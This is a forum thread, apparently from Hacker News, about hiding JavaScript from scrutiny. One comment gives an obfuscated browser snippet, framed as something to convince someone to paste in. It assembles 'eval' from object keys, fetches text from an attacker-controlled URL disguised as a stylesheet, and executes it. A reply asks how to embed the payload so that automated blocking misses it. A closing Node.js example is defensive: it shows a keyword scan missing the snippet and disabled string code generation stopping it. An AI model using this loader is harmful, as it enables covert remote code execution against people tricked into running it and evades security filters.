by zachrose 4008 days ago
Assuming this is JavaScript in a browser, I guess it depends on who you're trying to fool. It sounds like you're going for obfuscated or "underhanded" code.

Just messing around, here's something you might try. You might convince someone to paste in a CSS link and an obscure but short snippet of JavaScript. (Okay!) Then:

    <link rel="stylesheet" href="//your.domain/style.css" id="ok">
    <script>var s = function(k){return k.split('')};
    var obj = Object.keys({value:3}).map(s);
    // 'e' + 'valu' split into characters, minus the trailing 'u'
    var f = s(obj[0].pop().concat(obj[0].join(''))); f.pop();
    fetch(document.getElementById('ok').href+"?x").then(function(r){
      // pass the response text to the global function named by f
      r.text().then(window[f.join('')]);
    });</script>
Serve a stylesheet at your.domain/style.css and serve JavaScript at your.domain/style.css?x. The JS here will fetch that as text and eval it.
1 comments

But this could be auto blocked by blocking style.css.

My assumption is that I am in control of both (a) and (b) so I can mess around with the output of (b) to have all of (a) within itself.

The problem is how to best inject (a) inside (b), without using any 3rd party resources, which could be blocked automatically.
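
From the defender's side of the snippet in the first comment, an added example for Node.js (not code from the thread): a keyword scan misses the call because the name is assembled at run time, while disabling code generation from strings, the kind of control a Content-Security-Policy without 'unsafe-eval' applies in browsers, stops it regardless of how the name was built. `SNIPPET`, `naiveScan`, `runSnippet` and the payload string are constructed for the illustration.

```javascript
// Added example, not code from the thread. All names here are constructed.
const vm = require('vm');

// Stand-in for the pasted snippet: the function name is assembled from
// Object.keys() output, so the source never contains it as a literal.
const SNIPPET = `
  var s = function (k) { return k.split(''); };
  var obj = Object.keys({ value: 3 }).map(s);
  var f = s(obj[0].pop().concat(obj[0].join('')));
  f.pop();
  globalThis[f.join('')](payload);
`;

// What a keyword filter sees: a literal match on the name, nothing more.
function naiveScan(source) {
  return /\beval\b/.test(source);
}

// Run the snippet in a fresh context. `payload` plays the role of the text
// fetched from style.css?x; it flips a marker so we can tell whether it ran.
function runSnippet(allowStringCode) {
  const sandbox = { payload: 'marker = "executed"', marker: 'untouched' };
  const context = vm.createContext(sandbox, {
    codeGeneration: { strings: allowStringCode, wasm: false },
  });
  try {
    vm.runInContext(SNIPPET, context);
    return { marker: sandbox.marker, error: null };
  } catch (err) {
    // The error object comes from the other context, so compare by name.
    return { marker: sandbox.marker, error: err.name };
  }
}

console.log('keyword scan flags snippet:', naiveScan(SNIPPET));
console.log('strings allowed:   ', runSnippet(true));
console.log('strings disallowed:', runSnippet(false));
```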